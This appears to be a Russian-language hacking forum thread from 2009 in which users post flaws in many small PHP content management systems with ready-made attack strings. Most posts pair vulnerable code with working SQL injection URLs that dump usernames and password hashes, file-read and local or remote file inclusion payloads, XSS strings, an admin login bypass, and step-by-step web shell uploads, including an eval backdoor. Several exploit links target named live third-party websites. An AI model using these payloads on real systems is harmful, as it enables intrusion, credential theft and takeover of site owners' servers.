. " left join {$this->_name}{$this->_trans} t on (t.{$this->_item} = m.id)"
. " where m.id = '$id' group by {$this->_lang}";
} else {
$query = "select * from {$this->_name} where id = '$id'";
}
$result = $this->db->exeQuery($query);

$main_fields = $this->db->getFields($this->_name);
if ($is_trans) {
$trans_fields = $this->db->getFields($this->_name . $this->_trans);
$trans_fields = array_flip($trans_fields);
} else {
$trans_fields = array();
}
unset($trans_fields[$this->_item], $trans_fields[$this->_lang]);
$trans_fields = array_flip($trans_fields);

$data = array();
while ($row = mysql_fetch_assoc($result)) {
foreach ($row as $field => $value) {
if (in_array($field, $main_fields)) {
$data[$field] = $value;
} elseif (in_array($field, $trans_fields)) {
$data[$field][$row[$this->_lang]] = $value;
}
}
}
if (isset($data['id'])) {
$this->_cache[$data['id']] = $data;
}
}
return $data;
}

=========================================

Оформленый эксплойт:

[+]--------------------------------------------------------------------------------------------------------------------[+]
[+]--------------------------------------------[Irokez 0.7.1 SQL inlection]--------------------------------------------[+]
[+]--------------------------------------------------------------------------------------------------------------------[+]

-[INFO]----------------------------------------------------------------------------------------------------------------[+]
[+] Title:Irokez 0.7.1 SQL inlection
[+] Autor: Ins3t
[+] Date:04.08.2009
[+]--------------------------------------------------------------------------------------------------------------------[+]

-[BUG INFO]------------------------------------------------------------------------------------------------------------[+]
[+] The vulnerability is caused by insufficient processing of select() function, which led to the SQL inj.
[+] Conditions: magic_quotes_gpc = Off
[+] Code vulnerable functions:

[+]----------------------------------------------------------------------------------------------------------------[+]
function select($id)
{
if (isset($this->_cache[$id])) {
$data = $this->_cache[$id];
} else {
$data = array();
/*
get data
*/
$is_trans = in_array($this->_name.$this->_trans, $this->db->getTables());
if ($is_trans) {
$query = "select t.*, m.* from {$this->_name} m"
. " left join {$this->_name}{$this->_trans} t on (t.{$this->_item} = m.id)"
. " where m.id = '$id' group by {$this->_lang}";
} else {
$query = "select * from {$this->_name} where id = '$id'";
}
$result = $this->db->exeQuery($query);

$main_fields = $this->db->getFields($this->_name);
if ($is_trans) {
$trans_fields = $this->db->getFields($this->_name . $this->_trans);
$trans_fields = array_flip($trans_fields);
} else {
$trans_fields = array();
}
unset($trans_fields[$this->_item], $trans_fields[$this->_lang]);
$trans_fields = array_flip($trans_fields);

$data = array();
while ($row = mysql_fetch_assoc($result)) {
foreach ($row as $field => $value) {
if (in_array($field, $main_fields)) {
$data[$field] = $value;
} elseif (in_array($field, $trans_fields)) {
$data[$field][$row[$this->_lang]] = $value;
}
}
}
if (isset($data['id'])) {
$this->_cache[$data['id']] = $data;
}
}
return $data;
}
[+]--------------------------------------------------------------------------------------------------------------[+]

[+] Exploit:

[+]----------------------------------------------------------------------------------------------------------------[+]

http://localhost/cms/ru/news/7'+union+select+1,2,concat_ws(0x3a,login,pass),4,5 ,6,7,8,9,10,11,12+from+icm_users--+/?page=1

[+]--------------------------------------------------------------------------------------------------------------[+]

Ins3t

09.08.2009, 01:09

Mini-CMS 1.0.1 SQL inlection

Вот наткнулся на Mini-CMS 1.0.1, скачал, открыл первый попавшийся сорец, сразу понял, что CMS бажная..

Уязвимый файл: page.php

Фрагмент уязвимого кода:

<?php
$id = $_GET['id'];
database_connect();
$query = "SELECT * from content
WHERE id = $id";
$error = mysql_error();
if (!$result = mysql_query($query)) {
print "$error";
exit;
}

while($row = mysql_fetch_object($result)){
$content = $row->text;
print("$content");
}
?>

Требования: magic_quotes_gpc = Off и полный путь к config.php

Эксплатация уязвимости:
http://localhost/page.php?id=-1+union+select+1,2,3,4,load_file('[FULL_PATCH_OF_FILE_CONFIG.PHP]'),6,7,8,9+into+outfile+'[FULL_PATCH]/config.txt'--+

Пароли от админки не хранятся в базе данных, а хранятся в файле config.php, из за этого нам приходится записывать конфиг в текстовый файл ( хотя лутше уже шелл лить :) ).

Оформленый эксплойт:

[+]--------------------------------------------------------------------------------------------------------------------[+]
[+]--------------------------------------------[Mini-CMS 1.0.1 SQL inlection]------------------------------------------[+]
[+]--------------------------------------------------------------------------------------------------------------------[+]

-[INFO]----------------------------------------------------------------------------------------------------------------[+]
[+] Title:Mini-CMS 1.0.1 SQL inlection
[+] Autor: Ins3t
[+] Site: www.arthacking.net
[+] Date:08.08.2009
[+]--------------------------------------------------------------------------------------------------------------------[+]

-[BUG INFO]------------------------------------------------------------------------------------------------------------[+]
[+] The vulnerability occurs due to insufficient filtering transferred database parameters. Password is not in the
database, and in the config.php file.
[+] Conditions: magic_quotes_gpc = Off | full patch of file config.php
[+] Code vulnerable functions:

[+]----------------------------------------------------------------------------------------------------------------[+]
<?php
$id = $_GET['id'];
database_connect();
$query = "SELECT * from content
WHERE id = $id"; <------(BUG)
$error = mysql_error();
if (!$result = mysql_query($query)) {
print "$error";
exit;
}

while($row = mysql_fetch_object($result)){
$content = $row->text;
print("$content");
}
?>
[+]---------------------------------------------------------------------------------------------------------------[+]

[+] Exploit:

[+]----------------------------------------------------------------------------------------------------------------[+]

http://localhost/page.php?id=-1+union+select+1,2,3,4,load_file('[FULL_PATCH_OF_FILE_CONFIG.PHP]'),6,7,8,9+into+outfile+'[FULL_PATCH]'--+

[+]---------------------------------------------------------------------------------------------------------------[+]

Ctacok

16.08.2009, 23:55

Ngcms (http://ngcms.ru/)

XSS Активная (!)

Регестрируемся
В поле "Сайт" и "Откуда"
"><script>alert();</script>
При просмотре админом через админ панель ваш профайл, выполняется XSS.

$tvars['vars'] = array(
'php_self' => $PHP_SELF,
'sort_options' => $sort_options,
'how_options' => $how_options,
'npp_nav' => $npp_nav,
'entries' => $entries,
'per_page' => $per_page,
'name' => htmlspecialchars($_REQUEST['name']),
);

$tpl -> template('table', tpl_actions.$mod);
$tpl -> vars('table', $tvars);
echo $tpl -> show('table');

Ещё есть.

При добавление новости.
В краткое содержание или полное без разницы.
javascript:alert('XSS')

$tvars['vars'] = array(
'php_self' => $PHP_SELF,
'changedate' => ChangeDate($row['postdate']),
'catlist' => makeCategoryList(array('skip' => $cats, 'nameval' => 1)),
'allcats' => @GetAllCategories($cats),
'comments' => $parse->smilies($comments),
'id' => $row['id'],
'title' => secure_html($row['title']),
'short' => secure_html($story[0]),
'full' => secure_html($story[1]),
'alt_name' => $row['alt_name'],
'avatar' => $row['avatar'],
'description' => secure_html($row['description']),
'keywords' => secure_html($row['keywords']),
'views' => $row['views']
);

PS
Уязвим везде параметр

(c) Ctacok. Специально для Античат.

HAXTA4OK

21.08.2009, 22:59

KESoft: CMS Кеша

1.SQL - inj

#получаем список блоков
$z="select blocks.def_ps, blocks.fname, bpp.psev from blocks, bpp where (bpp.page_id=$pg)and(bpp.block_id=blocks.id)";
$result=mysql_query($z,$connect);

2. Доступ в админку

$z="select id,status from users where (login='".$_POST["u_login"]."')and(pass=PASSWORD('".$_POST["u_pass"]."'))";
$result=mysql_query($z,$connect);

при MQ=off
их офф сайт _http://www.kesoft.ru/index.php?pg=20'

Ну я как бы просто показал
Result:
http://www.kesoft.ru./index.php?pg=20+and+substring(version(),1,1)=5#

Чтение файлов

http://site.ru/RU(или ru)/blocks/Templ_lst.php?l=../../db.php%00

файл:UserPar.php
pg_param.php

http://www.сайт.ru/ru/blocks/UserPar.php?l=../
http://www.kesoft.ru/ru/blocks/UserPar.php?l=Http://mail.ru/%00 (читаем mail.ru :D)

Инклуд удаленный Даже файл админа в инклуде :D
http://www.kesoft.ru/admin.php?l='%00

условия в посте Grey'a
P.S. Там что не файл, то уязвимость) PSS угу :D

Grey

21.08.2009, 23:23

KESoft: CMS Кеша

Зачетная cms:

Чтение файлов:
Файл: blocks/auth.php
<?php
$bdata=file($l."blocks/Auth.dat");
$bdata=str_replace("@u_login@",$u,$bdata);
$bdata=str_replace("@u_pass@","",$bdata);
for ($ii=0; $ii<count($bdata); $ii++) {
echo $bdata[$ii];

Юзаем так: http://site.ru/RU(или ru)/blocks/auth.php?l=../../db.php%00

Создание произвольного файла:
Файл: RU(или ru)/blocks/BlockPar.php
if (count($_POST)>0) {
.....................
if ($_POST["Submit"]=="Сохранить изменения текста") {
$z="select fname from blocks where id=$par";
$tmpr=mysql_query($z,$connect);
$fp = fopen ($l.mysql_result($tmpr,0,"fname"),"w");
fputs($fp,$_POST["BlockData"]);
fclose($fp);
$m="Содержимое файла блока <font color=green>заменено</font>";
};

Юзаем так:

<html>
<head><title>pLoEnT na HTML!!!</title></head>
<body>
<form action="http://site.ru/RU(или ru)/blocks/BlockPar.php?l=../../file.php%00" method="post">
<textarea name="BlockData" cols="80" rows="10"></textarea>
<input type="submit" name="Submit" value="Сохранить изменения текста">
</form>
</body>
</html>

Ой, а там файлов больше чем я думал, продолжим:

Удалённый инклуд:
Файл: RU(или ru)/blocks/reg.php
<?php
include $l."blocks\\UserPar.php";
?>

Юзаем так: http://site.ru/RU(или ru)/blocks/reg.php?l=http://heck.ru/file.php?

Даже листинг дир в комплект входит:
Юзаем так: http://site.ru/RU(или ru)/blocks/moduls.php?l=../../%00 (правда вывод кривой, но это мелочи)

Нужно: mq=off, rg=on, ну а для удалённого инклуда ещё и allow_url_include=он

P.S. Там что не файл, то уязвимость)

mailbrush

23.08.2009, 00:16

Продукт: CMS Mini
Версия: <= 0.2.2
Оффсайт: cmsmini.it
Скачать: http://sourceforge.net/projects/cmsmini/

Уязвимость №1:
Проникновение в админ-панель.

Уязвимость существует из-за недостаточной фильтрации данных.

Уязвимый код:
/admin/check.php
if ($_SESSION['cmsmini_login'] != 1) header('location: login.php');

Если параметр cmsmini_login отличен от еденици, сервер отправляет заголовок Location: login.php. Но выполнения скрипта не останавливается. Это всего лишь браузер воспринимает заголовк как редирект.

Эксплуатация:
Для эксплуатации уязвимости необходимо использовать сниффер отправленых пакетов. После открытия страницы /admin/index.php, сниффер получит заголовки вида:
HTTP/1.1 302 Found
Date: Sat, 22 Aug 2009 19:16:45 GMT
Server: Apache/2.2.11 (Win32) PHP/5.2.9-2
X-Powered-By: PHP/5.2.9-2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: login.php
Transfer-Encoding: chunked
Content-Type: text/html
Кроме них в сниффере можно увидеть тело админки. Неудобная, но все же уязвимость.

Уязвимость №2:
Заливка файла произвольного расширения.

Уязвимость существует из-за отсутствия фильтрации/проверки расширения файла.

Уязвимый код:
/admin/index.php
case 'newimage':
$imagefile = $_FILES['imagefile'];
if( is_uploaded_file($imagefile['tmp_name']) ) new_image($imagefile, $dirpath);
else die('image upload failed...');
break;

/admin/functions.php
function new_image($imagefile, $dirpath){
$name = $imagefile['name'];
$filename = $dirpath.'/'.$name;
$dirlist = $dirpath.'/dir.list';
$new_row = $name.'|'.$name.'|0|';
move_uploaded_file($imagefile['tmp_name'], $filename);
in_dirlist($dirlist, $new_row);
}

Эксплуатация:
Залить любой файл в поле Image.

Уязвимость №3:
Читалка файлов.

Уязвимость существует из-за отсутствия фильтрации входящих данных в параметре path.

Уязвимый код:
/admin/index.php
$subpath = $_GET['path'];
if( $subpath )
$dirpath = '../pages/'.$subpath;
...
$dirlist = $dirpath.'/dir.list';
...
$rows = file($dirlist);
...
$n = count($rows);
...
for( $i=0; $i<$n; $i++ ){
//тут много echo с выводом файла

Эксплуатация:
/admin/index.php?path=../admin/config.php%00

Уязвимость №4:
Активная XSS.

Уязвимость существует из-за отсутствия фильтрации входящих данных.

Уязвимый код:
/admin/index.php
echo $title.'</span>';

Эксплуатация:
HTML-код в поле Page/Folder -> create new page / create new folder.

Уязвимость №5:
"Листинг" директорий.

Уязвимость существует из-за отсутствия запрета на чтение файла со списком файлов/директрий.

/folder/dir.list

© mailbrush

Это не все дырки этой CMS...

HAXTA4OK

24.08.2009, 11:15

Продукт: CMS Mini
Версия: <= 0.2.2
Оффсайт: cmsmini.it
Скачать: http://sourceforge.net/projects/cmsmini/

1. Читалка файлов

admin/edit.php

$filename = $dirpath.'/'.$name;
$fh = fopen($filename, 'r');

Эксплуатация
cmsmini-0.2.2./admin/edit.php?path=&name=../COPYING

При register_globals On

2. Пассивная XSS

cmsmini-0.2.2./admin/index.php?path=%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E

3. Создание произвольного файла

cmsmini-0.2.2./admin/reorder.php?path=../reorder1.php%00

mailbrush

25.08.2009, 13:27

']TYPO3 CMS 4.0
SQL-injection: http://www.site.com/index.php?id=[xxx][showUid]=-1+union+select+username,2,password,4,5,6,7+from+be _users--&cHash=[xxx]
Если нету копирайта, значит уязвимость найдена автором сообщения. Хотя это не так.

http://tinyurl.com/mykouz

[underwater]

26.08.2009, 13:52

Linkspile

SQL Inj:
http://www.site.ru/link.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0 x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,1 8/**/from/**/lp_user_tb/*

POC:
http://www.linkspile.com/linking.page.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0 x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,1 8/**/from/**/lp_user_tb/*

HAXTA4OK

27.08.2009, 00:15

']Linkspile

SQL Inj:
http://www.site.ru/link.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0 x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,1 8/**/from/**/lp_user_tb/*

POC:
http://www.linkspile.com/linking.page.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0 x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,1 8/**/from/**/lp_user_tb/*

http://www.linkspile.com/user.link.page.php?siteid=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_w s(0x3a,user(),database(),version()),14,15,16,17,18--&lng=PHP

ЗЫ.как бэ добавлю, но вроде все это постить не сюда бы)))так как сорцов нету на руках)))и код выложить не можем

HAXTA4OK

09.09.2009, 16:26

SOS Webpages
Сайт: http://www.soswebpages.com/
Табличка с логинами\хешами админов: hw_admin
Дефолтовый префикс: sos_

SQL-injection

Уязвимый код:
photo.php

. . .
if (isset($_GET['photo_id'])) {

$photo_id = mysql_real_escape_string($_GET['photo_id']);
$sql = "SELECT * FROM " . $dbprefix . "photos WHERE photo_id=$photo_id";
$result=mysql_query($sql);
. . .

Классный код )) Зачем спрашивается юзать mysql_real_escape_string() и при этом не обрамлять параметр кавычками в запросе :D
Аналогично с переменной event_id в этом же скрипте

. . .
elseif (isset($_GET['event_id'])) {

$event_id = mysql_real_escape_string($_GET['event_id']);
. . .
$sql = "SELECT * FROM " . $dbprefix . "events WHERE event_id=$event_id";
$result=mysql_query($sql);
. . .

забавный код в файле admin_delete_image.php

/* admin_delete_image.php will delete an image from the server */

Require "passcheck.php";
$image=$_GET["image"];
if (file_exists("../uploads/$image")) {
unlink("../uploads/$image");
}
header("Location: admin_view_images.php");
exit;
?>
имея права админа можно удалить любые файлы!!который имеют соответсвующие права

admin/admin_delete_image.php?image=../index.php%00 и у нас стерается наш index.php

ElteRUS

06.10.2009, 22:23

weenCompany
китайская цмс

Сайт: http://www.weentech.com/
Дорк: "Created by weenCompany"

SQL-injection

Уязвимый код:
index.php
. . .
if($article = $DB->query_first("SELECT title, metakeywords, metadescription
FROM " . TABLE_PREFIX . $_GET['moduleid']. " WHERE articleid = '" . $_GET['articleid'] . "'"))
. . .

Эксплуатация:

site.com/index.php?moduleid=m2_news[SQL-inj]&articleid=1

Примеры:

http://www.stone-business.com/index.php?moduleid=m2_news+where+articleid=-1+union+select+concat_ws(0x2F,username,password),2 ,3+from+cwsen_users--+&articleid=1
http://perrint.com/index.php?moduleid=m2_news+where+articleid=-1+union+select+concat_ws(0x2F,username,password),2 ,3+from+cwsen_users--+&articleid=1

Вывод в тайтле

HAXTA4OK

14.10.2009, 10:09

TGS Content Management
Только нужна рега, а где там регаться я не нашел (

SQL
Файл Message.php
MQ=off
$id = $_GET['id'];
$query = "SELECT * FROM $table_messanger WHERE messanger_id = '".$id."' ";
думаю что во всех версиях, в последней есть она

Файл user.php
$userid = $_GET['id'];
$user_table = $prefix."backend_user";
$usermanager_query = "SELECT * FROM $user_table WHERE user_id = '".$userid."' ";

Файл gallery.php
switch($_GET['option'])
{
case "delete":

if (!isset($_GET['iID']))
{ // delete gallery and all images
$query = "SELECT * FROM `".$table_images."` WHERE `gallery_id` = '".$_GET['gID']."' ";

HAXTA4OK

14.10.2009, 22:14

OneCMS тока я чет не нашел их(((

вход в админку

if ($_GET['load'] == "login") {
$admin_page = "yes";
if ($_GET['login'] == "yes") {
$usernameb = check(stripcslashes($_POST['username']));
$passwordc = check($_POST['password']);
$passwordb = md5($passwordc);

$sql = mysql_query("SELECT * FROM ".$pre."users WHERE username = '".$usernameb."' AND password = '".$passwordb."' LIMIT 1");
$login_check = mysql_num_rows($sql);

login :' or 1=1/*
pass :любой

HAXTA4OK

15.10.2009, 15:09

MycroCMS
Blind SQL

exploit:
?cat_id=2'+and+substring(version(),1,1)=5+--+

_http://www.makesense.ch/mycrocms/?cat_id=2'+and+substring(version(),1,1)=5+--+

PS дыру с entry_id залотали

Qwazar

16.10.2009, 16:59

MultiEngine CMS 0.9.4
LFI

PoC: http://site.ru/?mod=.../.../.../.../.../.../.../etc/passwd

HAXTA4OK

16.10.2009, 19:11

MixedCMS_10
LFI

$mod = $_REQUEST['mod'];
$op = $_REQUEST['op'];
$isadmin = $_REQUEST['isadmin'];

include "../engine/db.config.php";
include "./mod/".$mod."/".$mod."_admin.php";

http://site.com/modules/mod.php?mod='%00

там есть аплоад
Аплодим шелл

Файл download_admin.php

include "./mod/download/download_config.php";
...
<td align=\"center\"><a href=\"mod.php?mod=download&op=add&isadmin=1\"><b>Add Download</b></a></td>
<td align=\"center\"> </td>
...
if (!@copy($url, $gal_path."/".$url))
{
disp_error($url." failed to copy");
}
unlink($url);
...

download_config.php
$gal_path = './mod/download/archieves';

по этому куску кода видно mod.php?mod=download&op=add&isadmin=1\" Add Download

значит надо его грузить

http://site.com/modules/mod.php?mod=download&op=add&isadmin=1

затем загружаем шелл и получаем его по адресу modules/mod/download/archieves/shell.php

PS гуглом и поиском проверил вроде нету такой

Dimi4

24.10.2009, 15:20

OneFileCMS (http://onefilecms.com/)
Обход авторизацаии
На серваке, в общем /tmp
Создаем сесию, например:
sess_blablabla
onefilecms_valid|s:1:"1";
chmod 777 sess_blablabla
Вставляем куку в браузер:
PHPSESSID=blabla
И используем багу чтобы прочитать пароли:
http://host/onefile/onefilecms.php?f=onefilecms.php
File upload:
http://host/onefile/onefilecms.php?p=upload&i=new/

HAXTA4OK

25.10.2009, 11:24

ShopOS
2.4.2
не знаю как назвать :D типа

...
$filename = $_GET['f'];
...
$fp = fopen($filename, 'w');
fwrite($fp, $content);
fclose($fp);

http://site/google_sitemap.php?f=index.php

в итоге у нас файл index.php примет код
<?xml version='1.0' encoding='UTF-8'?>
<urlset xmlns="http://www..com/schemas/sitemap/0.84"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www..com/schemas/sitemap/0.84
http://www.google.com/schemas/sitemap/0.84/sitemap.xsd">
<url>
<loc>http://127.0.0.1/upload444/index.php?cat=1</loc>
<priority>1.0</priority>
<lastmod>2010-01-01T01:01:01+03:00</lastmod>
<changefreq>weekly</changefreq>
</url>
....

__http://www.vale4ka.org.ua/google_sitemap.php?f=ir.php
__http://www.vale4ka.org.ua/ir.php
Parse error: syntax error, unexpected T_STRING in /var/www/ir.php on line 1

в 2.4.3
это файл xml_sitemap.php

Ctacok

25.10.2009, 23:14

ClipShare вроде 4.0

Пассивная XSS :(

/tags/123%22%3E%3Cscript%3Ealert(/XSS/);%3C/script%3E

/search/?search_id=%22%3E%3Cscript%3Ealert(/XSS/);%3C/script%3E&search_type=search_videos&x=0&y=0

HAXTA4OK

28.10.2009, 14:42

iGamingCMS1.5
SQL
Файл reviews.php
$review = $db->Execute(" SELECT * FROM `sp_reviews` WHERE sp_reviews.id = '{$_REQUEST['id']}';");

__http://www.xboxelite.co.uk/reviews.php?do=view&id=-174'+union+select+1,version(),3,4,5,6,7,8,9,10,11, 12,13+--+

_http://www.xboxelite.co.uk/reviews.php?do=view&id=-174'+union+select+1,concat_ws(0x3a,PSEUDO,pass),3, 4,5,6,7,8,9,10,11,12,13+from+sp_members+--+

ЗЫ префикс у них sp_

Blind-sql
Файл gamedetails.php
$result = $db->Execute("SELECT * FROM `sp_games` WHERE `id` = '$_REQUEST[id]' LIMIT 1");

__http://www.patches-scrolls.info/gamedetails.php?id=1+and+substring(version(),1,1)= 5

PS там еще есть фалики с типа таким же запросом

RFI/shell

в админке Файл loadplugin.php
require_once("$_REQUEST[load]");

необходимо
allow_url_include = on
MQ= off

http://127.0.0.1/iGamingCMS1.5/admin/loadplugin.php?load=http://shell.txt?
2) способ залития шелла

Файл template_editor.php

if ($myfilehandle=@fopen('../templates/' . $_REQUEST['filename'],'w')) { if (get_magic_quotes_gpc()) { $editbuffer = stripslashes($editbuffer); } fputs($myfilehandle,$editbuffer); fclose($myfilehandle); echo "Saved OK";

по сути
http://127.0.0.1/iGamingCMS1.5/admin/template_editor.php

там дается на выбор файлы из папки templates, но помоему нам ни чего не мешает выйти)из нее

http://127.0.0.1/iGamingCMS1.5/admin/template_editor.php?filename=../index.php

(ну или в один из инклудившихся файлов писать код)
и в дальнейшем пишем пыщ пыщ код))) или тупо код шелла :D

HAXTA4OK

30.10.2009, 09:30

PHMe
LFI

файл www.php

$currentFile = 'www.php'; require_once('con-fig/site_info.php'); require_once('con-fig/theme_info.php'); require_once("themes/{$Tdir}/top.php"); require_once('resources/function_list.php'); require_once("themes/{$Tdir}/bottom.php");

Файл resources/function_list.php

require('resources/mod/'.$_GET['action'].'.php');

http://localhost/phme/www.php?action=../../admin~/untitled

HAXTA4OK

30.10.2009, 21:33

iXon CMS
SQL

Уже по ходу любимый файл Rss.php

...
$id = $_GET['id'];
$post_data = get_all_post_data($id);
..
$result = mysql_query("SELECT * FROM comments WHERE post_id = $id ORDER BY comment_date ASC"); while ($comments = mysql_fetch_array($result))
...?>

http://localhost/iXon_CMS%200.30%20Beta/rss.php?id=1+union+select+1,2,3,4,5,6,7,unhex(hex( version())),9,10--

ну и вроде в инете видел что было выложено LFI

банальное раскрытие путей как с htmlspecialchars

$redirect = 'login-control.php?redirect_to='.urlencode($_GET['redirect_to']);

http://localhost/iXon_CMS%200.30%20Beta/ixon-admin/login.php?redirect_to[]=

urlencode() expects parameter 1 to be string, array given in C:\AppServ\www\iXon_CMS 0.30 Beta\ixon-admin\login.php on line 35

Ctacok

31.10.2009, 06:33

The Hablator chat

Раскрытие путей
В Cookies
PHPSESSID=!@#$%^&*

Ctacok

31.10.2009, 09:10

Set-CMS

Оффициальная страничка (http://setcms.org/)

Активная XSS
Модуль гостевая книга

if ($mc == "ok")
{
$title = "Сохранение сообщения";
if (isset($_COOKIE['flood_feedback'])) {$er[] = "Флуд-защита.Подождите некоторое время...";}
if (isset($_POST['user_name'])){setcookie("user_name", $_POST['user_name'], time()+333333333);}
if (isset($_POST['user_email'])){setcookie("user_email", $_POST['user_email'], time()+333333333);}
if (isset($_POST['user_icq'])){setcookie("user_icq", $_POST['user_icq'], time()+333333333);}
if (isset($_SESSION[$uniqueid.'name_admin'])){$_POST['user_name'] = $_SESSION[$uniqueid.'name_admin'];}
if (isset($_SESSION[$uniqueid.'email_admin'])){$_POST['user_email'] = $_SESSION[$uniqueid.'email_admin'];}
if (isset($_SESSION[$uniqueid.'icq_admin'])){$_POST['user_icq'] = $_SESSION[$uniqueid.'icq_admin'];}
$text_gb = saveuser($_POST['user_text']);
$name = saveuser($_POST['user_name']);
$email = saveuser($_POST['user_email']);
$icq = saveuser($_POST['user_icq']);
$code = $_POST['code'];
if ($code == "") { $er[] = "Нет кода!"; }
$ffile = file("files/feedback.set");
for($a=0;$a<count($ffile);$a++) {
$ee = explode("<>", $ffile[$a]);
if ($ee[5] == $code)
{ $er[] = "Флудишь,мля!Отправлено только одно сообщение"; }
}

В поле "Ваше имя" вставляем "><script>alert();</script>

Эта же бага встречается в комментариях к новостям.
Тоже поле имя.

Раскрытие путей :D

Раскрытие путей с помощью PHPSESSID
Думаю обьяснения не нужны.

Пассивная XSS

/?set=news&mc=readfull&do=1"><script>alert();</script>

HAXTA4OK

31.10.2009, 09:44

iManga_v0.3
SQL

Файл showcomments.php

$postid = $_GET['postid'];
$post = mysql_query("SELECT * FROM `" . $global['prefix'] . "news` WHERE id=" . $postid);
$post = mysql_fetch_array($post);

http://localhost/iManga_v0.3/upload/showcomments.php?postid=-1+union+select+1,version(),3,4,5--

http://localhost/iManga_v0.3/upload/showcomments.php?postid=-1+union+select+1,concat_Ws(0x3a,username,password) ,3,4,5+from+users--

ЗАливка шелла

в админке http://localhost/iManga_v0.3/upload/admin/postcomic.php

$target_path = "../comics/" . basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $target_path))
{echo "<strong>The comic was successfully uploaded.</strong>\n<br /><br />";

http://localhost/iManga_v0.3/upload/comics/shell.php

HAXTA4OK

03.11.2009, 18:22

Clicknet_CMS_v2.1
Чтение файлов

MQ=off
register_globals= on

Файл menu.php

<?php
$menufil = $_SERVER["DOCUMENT_ROOT"] . $lokal . "menus/$indhold[2].php";
$menuitems = file($menufil);

http://localhost/Clicknet_CMS_v2.1/plugins/menu.php?lokal=/путь/до/файла/admin/htpasswd

LFI

Файл index.php
MQ=off
register_globals= on

...
$lokal = $content;
} else {
$lokal = "/";
}
...
include($_SERVER["DOCUMENT_ROOT"] . $lokal . "count.php");

http://localhost/Clicknet_CMS_v2.1/index.php?content=/путь/до/файла%00

Файл head.php

if ($indhold[2])
{ echo "<td width=\"150\" valign=\"top\">\n"; include($_SERVER["DOCUMENT_ROOT"] . $lokal . "plugins/menu.php");
echo "</td>\n";

http://localhost/Clicknet_CMS_v2.1/head.php?indhold[2]=1&lokal=/путь/до/файла%00

Файл foot.php

include($_SERVER["DOCUMENT_ROOT"] . $lokal . "sys/fodnote.php");

http://localhost/Clicknet_CMS_v2.1/foot.php?lokal=/путь/до/файла%00

HAXTA4OK

03.11.2009, 21:29

ZAKRZAK
LFI

Файл index.php

include('include/init.php');

Файл init.php

if ($_SESSION['lang'])
$lang=$_SESSION['lang'];
if ($_GET['lang']) $lang=$_GET['lang'];
if (!$lang)
{ $lang=$usr_prefs['lang']; }
$_SESSION['lang']=$lang; include('langs/'.$lang.'.php');

http://localhost/zakrzak-0.01/index.php?lang=../../test

Pashkela

04.11.2009, 04:42

В теме есть часть информации по нижеследующему, но не так подробно:

Sad Raven Guest Book <=v1.3

Она же sr guest.

Вход в админ панель:

<?php
if (!isset($alogin) || md5($pass) != $Password[$alogin] || !isset($Password[$alogin]))
?>

1. Админка находится по адресу: http://site.com/guest/admin.php
2. Зайти можно с таким запросом (условие - register globals=on):

http://site.com/guest/admin.php?pass=3105&alogin=3105&Password[3105]=37e7897f62e8d91b1ce60515829ca282

3105 - цифра от балды, а 37e7897f62e8d91b1ce60515829ca282 - это md5(3105)

но мы пока не админы, т.к. в админку пустило, но при попытке выполнить какие-либо действия в админке нас опять выкидывает на залогивание, смотрим:

1. После перехода по ссылке выше у нас появятся две куки:

Имя:
alogin
Содержимое:
3105
Узел:
site.com
Путь:
/guest/

Имя:
pass
Содержимое:
3105
Узел:
site.com
Путь:
/guest/

к которым надо будет добавить третью (через тот же плагин для FF cookie editor):

Имя:
Password[3105]
Содержимое:
37e7897f62e8d91b1ce60515829ca282
Узел:
site.com
Путь:
/guest/

и вот тогда мы уже полноценные админы

2. Заливка шелла:

- Идем в http://site.com/guest/admin.php?design
- Правим footer.inc.php - вставляем

<?php eval(stripslashes($_GET[e]));?>

для 100% уверенности, обходим magic_quotes=ON

3. проверяем:

http://site.com/guest/index.php?e=phpinfo();

4. Льем шелл.
====================================

fckeditor <=2.2

возможны версии чуть выше:

dork: inurl:dialog/fck_about.html

Раскрытие пути заливки файла:

1. Идем по адресу - editor/filemanager/browser/default/connectors/test.html
может отличаться, всегда поймете что искать идя от корня (если доступен просмотр папок с веба)

2. Выставляем Connector: - PHP

3. Жмем "Get Folders and Files" - появляется примерно такое среди всего прочего:

url="/config/_uploads/File/"/>

что есть абсолютный путь куда будут заливаться файлы относительно корня сайта, она же папка, доступная на запись.

Залитие шелла:

1. Connector: - PHP
2. Переименовываем шелл (например wso2.php) в wso2.php.xss - т.е. на конце задаем несуществующее расширение файла.
3. Заливаем
4. Переходим по ссылке (исходя из примера выше):

http://site.com/config/_uploads/File/wso2.php.xss

и всё, у вас полноценный шелл

бонус:

в очень многих даже пропатченных и современных версиях fceditor все равно есть уязвимости, например раскрытие асболютного пути сервера, если заливать корректный тип файла, но в поле "Current Folder" подставить что-то вроде:

ini.php%00

часто вываливается ошибка записи из tmp-директории с полным путем к управляющему скрипту

PS: fceditor используется в большинстве CMS - редактирование новости, загрузка картинок, редактирование страниц - всё он практически, полный путь к fceditor можно узнать попытавшись вставить картинку в тело новости и нажать на то, что сверху в этом окошке, типо title - открывается веб-путь к fceditor.

Проверить версию (пример) -

http://topkredite.ch/_admin/_system/htmleditor/editor/dialog/fck_about.html

AFoST

04.11.2009, 15:10

SibirDesign AllRightReserved 2008

наверное, пользы от этого сообщения будет мало, но все равно выложу))
===================
LFI
magic_quotes = off

/index.php
...
include("login.php");
...
switch ($_GET['cmd']) {
case "config":
...
case "block":
$sym=array("q","w","e","r","t","y","u","i","o","p","a","s","d","f","g","h","j","k","l","z","x","c","v","b","n","m");
